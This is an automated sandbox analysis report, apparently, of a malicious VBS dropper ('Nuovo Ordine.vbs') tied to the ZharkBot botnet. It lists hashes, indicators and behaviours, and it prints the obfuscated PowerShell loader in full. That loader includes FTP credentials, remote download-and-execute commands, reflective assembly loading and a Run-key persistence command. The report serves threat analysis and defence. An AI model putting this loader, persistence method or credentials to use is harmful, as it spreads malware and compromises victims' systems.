Analysis
-
max time kernel
93s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
23-09-2024 17:29
Static task
static1
Behavioral task
behavioral1
Sample
Nuovo Ordine.vbs
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
Nuovo Ordine.vbs
Resource
win10v2004-20240802-en
General
-
Target
Nuovo Ordine.vbs
-
Size
562KB
-
MD5
ca8ac9a5b0023d32bcd76c65512a6cd3
-
SHA1
25291ca6801339de6d51840f921f6955d7d8f7af
-
SHA256
3fa4e2db3d9404f713f1f79a4eb79dda148325407408ef9d9a605479377295c8
-
SHA512
e1e7a3dbc7df71aa2a09e280eb018ef228b14380677cb469ac8d31e125fdbf973246a8f0e99e0ebea288c57b88f574217252ce1b151d8288b24575ac7b0f206f
-
SSDEEP
1536:kmmmmmmmmmmmmmmmmmmyFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFc:k5o1W
Malware Config
Extracted
https://drive.google.com/uc?export=download&id=
Extracted
Protocol: ftp- Host:
ftp.desckvbrat.com.br - Port:
21 - Username:
desckvbrat1 - Password:
developerpro21578Jp@@
Signatures
-
Detects ZharkBot payload 3 IoCs
ZharkBot is a botnet written C++.
resource yara_rule behavioral2/memory/2160-59-0x0000000000400000-0x0000000000454000-memory.dmp zharkcore behavioral2/memory/2160-63-0x0000000000400000-0x0000000000454000-memory.dmp zharkcore behavioral2/memory/2160-61-0x0000000000400000-0x0000000000454000-memory.dmp zharkcore -
Blocklisted process makes network request 7 IoCs
flow pid Process 8 2544 powershell.exe 17 2544 powershell.exe 19 2544 powershell.exe 22 2544 powershell.exe 24 2544 powershell.exe 26 2544 powershell.exe 30 3172 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\Control Panel\International\Geo\Nation WScript.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Update Drivers NVIDEO_k = "cmd.exe /c start /min \"\" Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Comman \". 'C:\\Users\\Admin\\AppData\\Local\\Microsoft\\LocalLow\\System Update\\snsix.ps1' \";exit" powershell.exe -
pid Process 4896 powershell.exe 3172 powershell.exe 4916 powershell.exe 2544 powershell.exe -
Indicator Removal: File Deletion 1 TTPs
Adversaries may delete files left behind by the actions of their intrusion activity.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 29 pastebin.com 30 pastebin.com -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 3172 set thread context of 2160 3172 powershell.exe 96 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
pid pid_target Process procid_target 2320 2160 WerFault.exe 96 -
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RegAsm.exe -
Suspicious behavior: EnumeratesProcesses 10 IoCs
pid Process 4916 powershell.exe 4916 powershell.exe 2544 powershell.exe 2544 powershell.exe 2544 powershell.exe 4896 powershell.exe 4896 powershell.exe 3172 powershell.exe 3172 powershell.exe 3172 powershell.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 4916 powershell.exe Token: SeDebugPrivilege 2544 powershell.exe Token: SeDebugPrivilege 4896 powershell.exe Token: SeDebugPrivilege 3172 powershell.exe -
Suspicious use of WriteProcessMemory 21 IoCs
description pid Process procid_target PID 4976 wrote to memory of 4916 4976 WScript.exe 82 PID 4976 wrote to memory of 4916 4976 WScript.exe 82 PID 4916 wrote to memory of 2544 4916 powershell.exe 84 PID 4916 wrote to memory of 2544 4916 powershell.exe 84 PID 2544 wrote to memory of 2284 2544 powershell.exe 89 PID 2544 wrote to memory of 2284 2544 powershell.exe 89 PID 2544 wrote to memory of 4896 2544 powershell.exe 90 PID 2544 wrote to memory of 4896 2544 powershell.exe 90 PID 2544 wrote to memory of 3172 2544 powershell.exe 94 PID 2544 wrote to memory of 3172 2544 powershell.exe 94 PID 2544 wrote to memory of 4592 2544 powershell.exe 95 PID 2544 wrote to memory of 4592 2544 powershell.exe 95 PID 3172 wrote to memory of 2160 3172 powershell.exe 96 PID 3172 wrote to memory of 2160 3172 powershell.exe 96 PID 3172 wrote to memory of 2160 3172 powershell.exe 96 PID 3172 wrote to memory of 2160 3172 powershell.exe 96 PID 3172 wrote to memory of 2160 3172 powershell.exe 96 PID 3172 wrote to memory of 2160 3172 powershell.exe 96 PID 3172 wrote to memory of 2160 3172 powershell.exe 96 PID 3172 wrote to memory of 2160 3172 powershell.exe 96 PID 3172 wrote to memory of 2160 3172 powershell.exe 96
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Nuovo Ordine.vbs"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4976 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$qKKzc = 'OwB9ҼмẦDsҼмẦKQҼмẦgҼмẦCkҼмẦIҼмẦҼмẦnҼмẦGUҼмẦdQByҼмẦHQҼмẦJwҼмẦgҼмẦCwҼмẦIҼмẦBYҼмẦFҼмẦҼмẦVQB1ҼмẦGgҼмẦJҼмẦҼмẦgҼмẦCwҼмẦIҼмẦҼмẦnҼмẦGgҼмẦdҼмẦB0ҼмẦHҼмẦҼмẦcwҼмẦ6ҼмẦC8ҼмẦLwBlҼмẦHYҼмẦaQByҼмẦHQҼмẦdQBhҼмẦGwҼмẦcwBlҼмẦHIҼмẦdgBpҼмẦGMҼмẦZQBzҼмẦHIҼмẦZQB2ҼмẦGkҼмẦZQB3ҼмẦHMҼмẦLgBjҼмẦG8ҼмẦbQҼмẦvҼмẦHcҼмẦcҼмẦҼмẦtҼмẦGkҼмẦbgBjҼмẦGwҼмẦdQBkҼмẦGUҼмẦcwҼмẦvҼмẦGYҼмẦbwBuҼмẦHQҼмẦcwҼмẦvҼмẦGkҼмẦdҼмẦBvҼмẦC4ҼмẦdҼмẦB4ҼмẦHQҼмẦJwҼмẦgҼмẦCgҼмẦIҼмẦBdҼмẦF0ҼмẦWwB0ҼмẦGMҼмẦZQBqҼмẦGIҼмẦbwBbҼмẦCҼмẦҼмẦLҼмẦҼмẦgҼмẦGwҼмẦbҼмẦB1ҼмẦG4ҼмẦJҼмẦҼмẦgҼмẦCgҼмẦZQBrҼмẦG8ҼмẦdgBuҼмẦEkҼмẦLgҼмẦpҼмẦCҼмẦҼмẦJwBJҼмẦFYҼмẦRgByҼмẦHҼмẦҼмẦJwҼмẦgҼмẦCgҼмẦZҼмẦBvҼмẦGgҼмẦdҼмẦBlҼмẦE0ҼмẦdҼмẦBlҼмẦEcҼмẦLgҼмẦpҼмẦCcҼмẦMQBzҼмẦHMҼмẦYQBsҼмẦEMҼмẦLgҼмẦzҼмẦHkҼмẦcgBhҼмẦHIҼмẦYgBpҼмẦEwҼмẦcwBzҼмẦGEҼмẦbҼмẦBDҼмẦCcҼмẦKҼмẦBlҼмẦHҼмẦҼмẦeQBUҼмẦHQҼмẦZQBHҼмẦC4ҼмẦKQҼмẦgҼмẦFoҼмẦYwBCҼмẦGMҼмẦYQҼмẦkҼмẦCҼмẦҼмẦKҼмẦBkҼмẦGEҼмẦbwBMҼмẦC4ҼмẦbgBpҼмẦGEҼмẦbQBvҼмẦEQҼмẦdҼмẦBuҼмẦGUҼмẦcgByҼмẦHUҼмẦQwҼмẦ6ҼмẦDoҼмẦXQBuҼмẦGkҼмẦYQBtҼмẦG8ҼмẦRҼмẦBwҼмẦHҼмẦҼмẦQQҼмẦuҼмẦG0ҼмẦZQB0ҼмẦHMҼмẦeQBTҼмẦFsҼмẦOwҼмẦpҼмẦCҼмẦҼмẦKQҼмẦgҼмẦCcҼмẦQQҼмẦnҼмẦCҼмẦҼмẦLҼмẦҼмẦgҼмẦCcҼмẦkyE6ҼмẦJMhJwҼмẦgҼмẦCgҼмẦZQBjҼмẦGEҼмẦbҼмẦBwҼмẦGUҼмẦUgҼмẦuҼмẦGcҼмẦUwB6ҼмẦEMҼмẦQgBsҼмẦCQҼмẦIҼмẦҼмẦoҼмẦGcҼмẦbgBpҼмẦHIҼмẦdҼмẦBTҼмẦDQҼмẦNgBlҼмẦHMҼмẦYQBCҼмẦG0ҼмẦbwByҼмẦEYҼмẦOgҼмẦ6ҼмẦF0ҼмẦdҼмẦByҼмẦGUҼмẦdgBuҼмẦG8ҼмẦQwҼмẦuҼмẦG0ҼмẦZQB0ҼмẦHMҼмẦeQBTҼмẦFsҼмẦIҼмẦҼмẦ9ҼмẦCҼмẦҼмẦWgBjҼмẦEIҼмẦYwBhҼмẦCQҼмẦIҼмẦBdҼмẦF0ҼмẦWwBlҼмẦHQҼмẦeQBCҼмẦFsҼмẦOwҼмẦnҼмẦCUҼмẦSQBoҼмẦHEҼмẦUgBYҼмẦCUҼмẦJwҼмẦgҼмẦD0ҼмẦIҼмẦBYҼмẦFҼмẦҼмẦVQB1ҼмẦGgҼмẦJҼмẦҼмẦ7ҼмẦCkҼмẦIҼмẦBnҼмẦFMҼмẦegBDҼмẦEIҼмẦbҼмẦҼмẦkҼмẦCҼмẦҼмẦKҼмẦBnҼмẦG4ҼмẦaQByҼмẦHQҼмẦUwBkҼмẦGEҼмẦbwBsҼмẦG4ҼмẦdwBvҼмẦEQҼмẦLgBwҼмẦHoҼмẦeQBhҼмẦCQҼмẦIҼмẦҼмẦ9ҼмẦCҼмẦҼмẦZwBTҼмẦHoҼмẦQwBCҼмẦGwҼмẦJҼмẦҼмẦ7ҼмẦDgҼмẦRgBUҼмẦFUҼмẦOgҼмẦ6ҼмẦF0ҼмẦZwBuҼмẦGkҼмẦZҼмẦBvҼмẦGMҼмẦbgBFҼмẦC4ҼмẦdҼмẦB4ҼмẦGUҼмẦVҼмẦҼмẦuҼмẦG0ҼмẦZQB0ҼмẦHMҼмẦeQBTҼмẦFsҼмẦIҼмẦҼмẦ9ҼмẦCҼмẦҼмẦZwBuҼмẦGkҼмẦZҼмẦBvҼмẦGMҼмẦbgBFҼмẦC4ҼмẦcҼмẦB6ҼмẦHkҼмẦYQҼмẦkҼмẦDsҼмẦKQB0ҼмẦG4ҼмẦZQBpҼмẦGwҼмẦQwBiҼмẦGUҼмẦVwҼмẦuҼмẦHQҼмẦZQBOҼмẦCҼмẦҼмẦdҼмẦBjҼмẦGUҼмẦagBiҼмẦE8ҼмẦLQB3ҼмẦGUҼмẦTgҼмẦoҼмẦCҼмẦҼмẦPQҼмẦgҼмẦHҼмẦҼмẦegB5ҼмẦGEҼмẦJҼмẦҼмẦ7ҼмẦCkҼмẦKҼмẦBlҼмẦHMҼмẦbwBwҼмẦHMҼмẦaQBkҼмẦC4ҼмẦcҼмẦB6ҼмẦHkҼмẦYQҼмẦkҼмẦDsҼмẦKQҼмẦgҼмẦCcҼмẦdҼмẦB4ҼмẦHQҼмẦLgҼмẦxҼмẦDҼмẦҼмẦTҼмẦBMҼмẦEQҼмẦLwҼмẦxҼмẦDҼмẦҼмẦLwByҼмẦGUҼмẦdҼмẦBwҼмẦHkҼмẦcgBjҼмẦHҼмẦҼмẦVQҼмẦvҼмẦHIҼмẦYgҼмẦuҼмẦG0ҼмẦbwBjҼмẦC4ҼмẦdҼмẦBhҼмẦHIҼмẦYgB2ҼмẦGsҼмẦYwBzҼмẦGUҼмẦZҼмẦҼмẦuҼмẦHҼмẦҼмẦdҼмẦBmҼмẦEҼмẦҼмẦMQB0ҼмẦGEҼмẦcgBiҼмẦHYҼмẦawBjҼмẦHMҼмẦZQBkҼмẦC8ҼмẦLwҼмẦ6ҼмẦHҼмẦҼмẦdҼмẦBmҼмẦCcҼмẦIҼмẦҼмẦoҼмẦGcҼмẦbgBpҼмẦHIҼмẦdҼмẦBTҼмẦGQҼмẦYQBvҼмẦGwҼмẦbgB3ҼмẦG8ҼмẦRҼмẦҼмẦuҼмẦHҼмẦҼмẦegB5ҼмẦGEҼмẦJҼмẦҼмẦgҼмẦD0ҼмẦIҼмẦBnҼмẦFMҼмẦegBDҼмẦEIҼмẦbҼмẦҼмẦkҼмẦDsҼмẦKQҼмẦnҼмẦEҼмẦҼмẦQҼмẦBwҼмẦEoҼмẦOҼмẦҼмẦ3ҼмẦDUҼмẦMQҼмẦyҼмẦG8ҼмẦcgBwҼмẦHIҼмẦZQBwҼмẦG8ҼмẦbҼмẦBlҼмẦHYҼмẦZQBkҼмẦCcҼмẦLҼмẦҼмẦpҼмẦCkҼмẦOQҼмẦ0ҼмẦCwҼмẦNgҼмẦxҼмẦDEҼмẦLҼмẦҼмẦ3ҼмẦDkҼмẦLҼмẦҼмẦ0ҼмẦDEҼмẦMQҼмẦsҼмẦDgҼмẦOQҼмẦsҼмẦDgҼмẦMQҼмẦxҼмẦCwҼмẦNwҼмẦwҼмẦDEҼмẦLҼмẦҼмẦ5ҼмẦDkҼмẦLҼмẦҼмẦ1ҼмẦDEҼмẦMQҼмẦsҼмẦDEҼмẦMҼмẦҼмẦxҼмẦCwҼмẦMҼмẦҼмẦwҼмẦDEҼмẦKҼмẦBdҼмẦF0ҼмẦWwByҼмẦGEҼмẦaҼмẦBjҼмẦFsҼмẦIҼмẦBuҼмẦGkҼмẦbwBqҼмẦC0ҼмẦKҼмẦҼмẦoҼмẦGwҼмẦYQBpҼмẦHQҼмẦbgBlҼмẦGQҼмẦZQByҼмẦEMҼмẦawByҼмẦG8ҼмẦdwB0ҼмẦGUҼмẦTgҼмẦuҼмẦHQҼмẦZQBOҼмẦC4ҼмẦbQBlҼмẦHQҼмẦcwB5ҼмẦFMҼмẦIҼмẦB0ҼмẦGMҼмẦZQBqҼмẦGIҼмẦbwҼмẦtҼмẦHcҼмẦZQBuҼмẦCҼмẦҼмẦPQҼмẦgҼмẦHMҼмẦbҼмẦBhҼмẦGkҼмẦdҼмẦBuҼмẦGUҼмẦZҼмẦBlҼмẦHIҼмẦQwҼмẦuҼмẦHҼмẦҼмẦegB5ҼмẦGEҼмẦJҼмẦҼмẦ7ҼмẦDgҼмẦRgBUҼмẦFUҼмẦOgҼмẦ6ҼмẦF0ҼмẦZwBuҼмẦGkҼмẦZҼмẦBvҼмẦGMҼмẦbgBFҼмẦC4ҼмẦdҼмẦB4ҼмẦGUҼмẦVҼмẦҼмẦuҼмẦG0ҼмẦZQB0ҼмẦHMҼмẦeQBTҼмẦFsҼмẦIҼмẦҼмẦ9ҼмẦCҼмẦҼмẦZwBuҼмẦGkҼмẦZҼмẦBvҼмẦGMҼмẦbgBFҼмẦC4ҼмẦcҼмẦB6ҼмẦHkҼмẦYQҼмẦkҼмẦDsҼмẦKQB0ҼмẦG4ҼмẦZQBpҼмẦGwҼмẦQwBiҼмẦGUҼмẦVwҼмẦuҼмẦHQҼмẦZQBOҼмẦCҼмẦҼмẦdҼмẦBjҼмẦGUҼмẦagBiҼмẦE8ҼмẦLQB3ҼмẦGUҼмẦTgҼмẦoҼмẦCҼмẦҼмẦPQҼмẦgҼмẦHҼмẦҼмẦegB5ҼмẦGEҼмẦJҼмẦҼмẦ7ҼмẦGcҼмẦUwB6ҼмẦEMҼмẦQgBsҼмẦCQҼмẦOwҼмẦyҼмẦDEҼмẦcwBsҼмẦFQҼмẦOgҼмẦ6ҼмẦF0ҼмẦZQBwҼмẦHkҼмẦVҼмẦBsҼмẦG8ҼмẦYwBvҼмẦHQҼмẦbwByҼмẦFҼмẦҼмẦeQB0ҼмẦGkҼмẦcgB1ҼмẦGMҼмẦZQBTҼмẦC4ҼмẦdҼмẦBlҼмẦE4ҼмẦLgBtҼмẦGUҼмẦdҼмẦBzҼмẦHkҼмẦUwBbҼмẦCҼмẦҼмẦPQҼмẦgҼмẦGwҼмẦbwBjҼмẦG8ҼмẦdҼмẦBvҼмẦHIҼмẦUҼмẦB5ҼмẦHQҼмẦaQByҼмẦHUҼмẦYwBlҼмẦFMҼмẦOgҼмẦ6ҼмẦF0ҼмẦcgBlҼмẦGcҼмẦYQBuҼмẦGEҼмẦTQB0ҼмẦG4ҼмẦaQBvҼмẦFҼмẦҼмẦZQBjҼмẦGkҼмẦdgByҼмẦGUҼмẦUwҼмẦuҼмẦHQҼмẦZQBOҼмẦC4ҼмẦbQBlҼмẦHQҼмẦcwB5ҼмẦFMҼмẦWwҼмẦ7ҼмẦH0ҼмẦZQB1ҼмẦHIҼмẦdҼмẦҼмẦkҼмẦHsҼмẦIҼмẦҼмẦ9ҼмẦCҼмẦҼмẦawBjҼмẦGEҼмẦYgBsҼмẦGwҼмẦYQBDҼмẦG4ҼмẦbwBpҼмẦHQҼмẦYQBkҼмẦGkҼмẦbҼмẦBhҼмẦFYҼмẦZQB0ҼмẦGEҼмẦYwBpҼмẦGYҼмẦaQB0ҼмẦHIҼмẦZQBDҼмẦHIҼмẦZQB2ҼмẦHIҼмẦZQBTҼмẦDoҼмẦOgBdҼмẦHIҼмẦZQBnҼмẦGEҼмẦbgBhҼмẦE0ҼмẦdҼмẦBuҼмẦGkҼмẦbwBQҼмẦGUҼмẦYwBpҼмẦHYҼмẦcgBlҼмẦFMҼмẦLgB0ҼмẦGUҼмẦTgҼмẦuҼмẦG0ҼмẦZQB0ҼмẦHMҼмẦeQBTҼмẦFsҼмẦewҼмẦgҼмẦGUҼмẦcwBsҼмẦGUҼмẦfQҼмẦgҼмẦGYҼмẦLwҼмẦgҼмẦDҼмẦҼмẦIҼмẦB0ҼмẦC8ҼмẦIҼмẦByҼмẦC8ҼмẦIҼмẦBlҼмẦHgҼмẦZQҼмẦuҼмẦG4ҼмẦdwBvҼмẦGQҼмẦdҼмẦB1ҼмẦGgҼмẦcwҼмẦgҼмẦDsҼмẦJwҼмẦwҼмẦDgҼмẦMQҼмẦgҼмẦHҼмẦҼмẦZQBlҼмẦGwҼмẦcwҼмẦnҼмẦCҼмẦҼмẦZҼмẦBuҼмẦGEҼмẦbQBtҼмẦG8ҼмẦYwҼмẦtҼмẦCҼмẦҼмẦZQB4ҼмẦGUҼмẦLgBsҼмẦGwҼмẦZQBoҼмẦHMҼмẦcgBlҼмẦHcҼмẦbwBwҼмẦDsҼмẦIҼмẦBlҼмẦGMҼмẦcgBvҼмẦGYҼмẦLQҼмẦgҼмẦCkҼмẦIҼмẦҼмẦnҼмẦHҼмẦҼмẦdQB0ҼмẦHIҼмẦYQB0ҼмẦFMҼмẦXҼмẦBzҼмẦG0ҼмẦYQByҼмẦGcҼмẦbwByҼмẦFҼмẦҼмẦXҼмẦB1ҼмẦG4ҼмẦZQBNҼмẦCҼмẦҼмẦdҼмẦByҼмẦGEҼмẦdҼмẦBTҼмẦFwҼмẦcwB3ҼмẦG8ҼмẦZҼмẦBuҼмẦGkҼмẦVwBcҼмẦHQҼмẦZgBvҼмẦHMҼмẦbwByҼмẦGMҼмẦaQBNҼмẦFwҼмẦZwBuҼмẦGkҼмẦbQBhҼмẦG8ҼмẦUgBcҼмẦGEҼмẦdҼмẦBhҼмẦEQҼмẦcҼмẦBwҼмẦEEҼмẦXҼмẦҼмẦnҼмẦCҼмẦҼмẦKwҼмẦgҼмẦFoҼмẦSwBuҼмẦFkҼмẦTQҼмẦkҼмẦCҼмẦҼмẦKҼмẦҼмẦgҼмẦG4ҼмẦbwBpҼмẦHQҼмẦYQBuҼмẦGkҼмẦdҼмẦBzҼмẦGUҼмẦRҼмẦҼмẦtҼмẦCҼмẦҼмẦJwҼмẦlҼмẦEkҼмẦaҼмẦBxҼмẦFIҼмẦWҼмẦҼмẦlҼмẦCcҼмẦIҼмẦBtҼмẦGUҼмẦdҼмẦBJҼмẦC0ҼмẦeQBwҼмẦG8ҼмẦQwҼмẦgҼмẦDsҼмẦIҼмẦB0ҼмẦHIҼмẦYQB0ҼмẦHMҼмẦZQByҼмẦG8ҼмẦbgҼмẦvҼмẦCҼмẦҼмẦdҼмẦBlҼмẦGkҼмẦdQBxҼмẦC8ҼмẦIҼмẦBHҼмẦGMҼмẦVwBpҼмẦFIҼмẦIҼмẦBlҼмẦHgҼмẦZQҼмẦuҼмẦGEҼмẦcwB1ҼмẦHcҼмẦIҼмẦBlҼмẦHgҼмẦZQҼмẦuҼмẦGwҼмẦbҼмẦBlҼмẦGgҼмẦcwByҼмẦGUҼмẦdwBvҼмẦHҼмẦҼмẦIҼмẦҼмẦ7ҼмẦCkҼмẦJwB1ҼмẦHMҼмẦbQҼмẦuҼмẦG4ҼмẦaQB3ҼмẦHҼмẦҼмẦVQBcҼмẦCcҼмẦIҼмẦҼмẦrҼмẦCҼмẦҼмẦTgBKҼмẦFQҼмẦeҼмẦBEҼмẦCQҼмẦKҼмẦҼмẦgҼмẦD0ҼмẦIҼмẦBHҼмẦGMҼмẦVwBpҼмẦFIҼмẦOwҼмẦpҼмẦCҼмẦҼмẦZQBtҼмẦGEҼмẦTgByҼмẦGUҼмẦcwBVҼмẦDoҼмẦOgBdҼмẦHQҼмẦbgBlҼмẦG0ҼмẦbgBvҼмẦHIҼмẦaQB2ҼмẦG4ҼмẦRQBbҼмẦCҼмẦҼмẦKwҼмẦgҼмẦCcҼмẦXҼмẦBzҼмẦHIҼмẦZQBzҼмẦFUҼмẦXҼмẦҼмẦ6ҼмẦEMҼмẦJwҼмẦoҼмẦCҼмẦҼмẦPQҼмẦgҼмẦFoҼмẦSwBuҼмẦFkҼмẦTQҼмẦkҼмẦDsҼмẦKQҼмẦnҼмẦHUҼмẦcwBtҼмẦC4ҼмẦbgBpҼмẦHcҼмẦcҼмẦBVҼмẦFwҼмẦJwҼмẦgҼмẦCsҼмẦIҼмẦBOҼмẦEoҼмẦVҼмẦB4ҼмẦEQҼмẦJҼмẦҼмẦgҼмẦCwҼмẦQgBLҼмẦEwҼмẦUgBVҼмẦCQҼмẦKҼмẦBlҼмẦGwҼмẦaQBGҼмẦGQҼмẦYQBvҼмẦGwҼмẦbgB3ҼмẦG8ҼмẦRҼмẦҼмẦuҼмẦHMҼмẦdҼмẦBtҼмẦG8ҼмẦbwҼмẦkҼмẦDsҼмẦOҼмẦBGҼмẦFQҼмẦVQҼмẦ6ҼмẦDoҼмẦXQBnҼмẦG4ҼмẦaQBkҼмẦG8ҼмẦYwBuҼмẦEUҼмẦLgB0ҼмẦHgҼмẦZQBUҼмẦC4ҼмẦbQBlҼмẦHQҼмẦcwB5ҼмẦFMҼмẦWwҼмẦgҼмẦD0ҼмẦIҼмẦBnҼмẦG4ҼмẦaQBkҼмẦG8ҼмẦYwBuҼмẦEUҼмẦLgBzҼмẦHQҼмẦbQBvҼмẦG8ҼмẦJҼмẦҼмẦ7ҼмẦCkҼмẦdҼмẦBuҼмẦGUҼмẦaQBsҼмẦEMҼмẦYgBlҼмẦFcҼмẦLgB0ҼмẦGUҼмẦTgҼмẦgҼмẦHQҼмẦYwBlҼмẦGoҼмẦYgBPҼмẦC0ҼмẦdwBlҼмẦE4ҼмẦKҼмẦҼмẦgҼмẦD0ҼмẦIҼмẦBzҼмẦHQҼмẦbQBvҼмẦG8ҼмẦJҼмẦҼмẦ7ҼмẦH0ҼмẦOwҼмẦgҼмẦCkҼмẦJwB0ҼмẦE8ҼмẦTҼмẦBjҼмẦF8ҼмẦSwBhҼмẦDMҼмẦWgBmҼмẦG8ҼмẦWҼмẦҼмẦyҼмẦEoҼмẦSgByҼмẦFYҼмẦaҼмẦBtҼмẦFYҼмẦOQBjҼмẦG0ҼмẦOQBYҼмẦHMҼмẦdQBYҼмẦG0ҼмẦagҼмẦxҼмẦGcҼмẦMQҼмẦnҼмẦCҼмẦҼмẦKwҼмẦgҼмẦG8ҼмẦeҼмẦBLҼмẦFUҼмẦZwҼмẦkҼмẦCgҼмẦIҼмẦҼмẦ9ҼмẦCҼмẦҼмẦbwB4ҼмẦEsҼмẦVQBnҼмẦCQҼмẦewҼмẦgҼмẦGUҼмẦcwBsҼмẦGUҼмẦfQҼмẦ7ҼмẦCҼмẦҼмẦKQҼмẦnҼмẦDIҼмẦNҼмẦB1ҼмẦFgҼмẦSgBUҼмẦHEҼмẦYQBtҼмẦGcҼмẦeQBNҼмẦHQҼмẦRgB6ҼмẦGEҼмẦawBQҼмẦFIҼмẦMQBxҼмẦF8ҼмẦSQB2ҼмẦEcҼмẦaQBYҼмẦE4ҼмẦZҼмẦBxҼмẦGEҼмẦTgҼмẦxҼмẦCcҼмẦIҼмẦҼмẦrҼмẦCҼмẦҼмẦbwB4ҼмẦEsҼмẦVQBnҼмẦCQҼмẦKҼмẦҼмẦgҼмẦD0AIABvAHgASwBVAGcAJAB7ACAAKQAgAHUATgBDAFYAcQAkACAAKAAgAGYAaQA7ACAAKQAnADQANgAnACgAcwBuAGkAYQB0AG4AbwBDAC4ARQBSAFUAVABDAEUAVABJAEgAQwBSAEEAXwBSAE8AUwBTAEUAQwBPAFIAUAA6AHYAbgBlACQAIAA9ACAAdQBOAEMAVgBxACQAOwAnAD0AZABpACYAZABhAG8AbABuAHcAbwBkAD0AdAByAG8AcAB4AGUAPwBjAHUALwBtAG8AYwAuAGUAbABnAG8AbwBnAC4AZQB2AGkAcgBkAC8ALwA6AHMAcAB0AHQAaAAnACAAPQAgAG8AeABLAFUAZwAkADsAKQAgACcAdQBzAG0ALgBuAGkAdwBwAFUAXAAnACAAKwAgAE4ASgBUAHgARAAkACAAKAAgAGwAZQBkADsAKQAoAGgAdABhAFAAcABtAGUAVAB0AGUARwA6ADoAXQBoAHQAYQBQAC4ATwBJAC4AbQBlAHQAcwB5AFMAWwAgAD0AIABOAEoAVAB4AEQAJAB7ACAAKQAgAGQAdgBvAGYAWAAkACAAKAAgAGYAaQA7ACAAKQAyACgAcwBsAGEAdQBxAEUALgByAG8AagBhAE0ALgBuAG8AaQBzAHIAZQBWAC4AdABzAG8AaAAkACAAPQAgAGQAdgBvAGYAWAAkACAAOwA=';$kahlN = $qKKzc.replace('ҼмẦ' , 'A') ;$DLOWx = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String( $kahlN ) ); $DLOWx = $DLOWx[-1..-$DLOWx.Length] -join '';$DLOWx = $DLOWx.replace('%XRqhI%','C:\Users\Admin\AppData\Local\Temp\Nuovo Ordine.vbs');powershell $DLOWx2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4916 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $Xfovd = $host.Version.Major.Equals(2) ;if ( $Xfovd ) {$DxTJN = [System.IO.Path]::GetTempPath();del ( $DxTJN + '\Upwin.msu' );$gUKxo = 'https://drive.google.com/uc?export=download&id=';$qVCNu = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $qVCNu ) {$gUKxo = ($gUKxo + '1NaqdNXiGvI_q1RPkazFtMygmaqTJXu42') ;}else {$gUKxo = ($gUKxo + '1g1jmXusX9mc9VmhVrJJ2XofZ3aK_cLOt') ;};$oomts = (New-Object Net.WebClient);$oomts.Encoding = [System.Text.Encoding]::UTF8;$oomts.DownloadFile($URLKB, $DxTJN + '\Upwin.msu');$MYnKZ = ('C:\Users\' + [Environment]::UserName );RiWcG = ($DxTJN + '\Upwin.msu'); powershell.exe wusa.exe RiWcG /quiet /norestart ; Copy-Item 'C:\Users\Admin\AppData\Local\Temp\Nuovo Ordine.vbs' -Destination ( $MYnKZ + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$lBCzSg;$ayzp = (New-Object Net.WebClient);$ayzp.Encoding = [System.Text.Encoding]::UTF8;$ayzp.Credentials = new-object System.Net.NetworkCredential((-join [char[]](100,101,115,99,107,118,98,114,97,116,49)),'developerpro21578Jp@@');$lBCzSg = $ayzp.DownloadString( 'ftp://[email protected]/Upcrypter/01/DLL01.txt' );$ayzp.dispose();$ayzp = (New-Object Net.WebClient);$ayzp.Encoding = [System.Text.Encoding]::UTF8;$lBCzSg = $ayzp.DownloadString( $lBCzSg );$huUPX = 'C:\Users\Admin\AppData\Local\Temp\Nuovo Ordine.vbs';[Byte[]] $acBcZ = [System.Convert]::FromBase64String( $lBCzSg.Replace( '↓:↓' , 'A' ) );[System.AppDomain]::CurrentDomain.Load( $acBcZ ).GetType('ClassLibrary3.Class1').GetMethod( 'prFVI' ).Invoke( $null , [object[]] ( 'txt.oti/stnof/sedulcni-pw/moc.sweiversecivreslautrive//:sptth' , $huUPX , 'true' ) );};"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2544 -
C:\Windows\SYSTEM32\cmd.execmd.exe /c mkdir "C:\Users\Admin\AppData\Local\Microsoft\LocalLow\System Update\"4⤵PID:2284
-
-
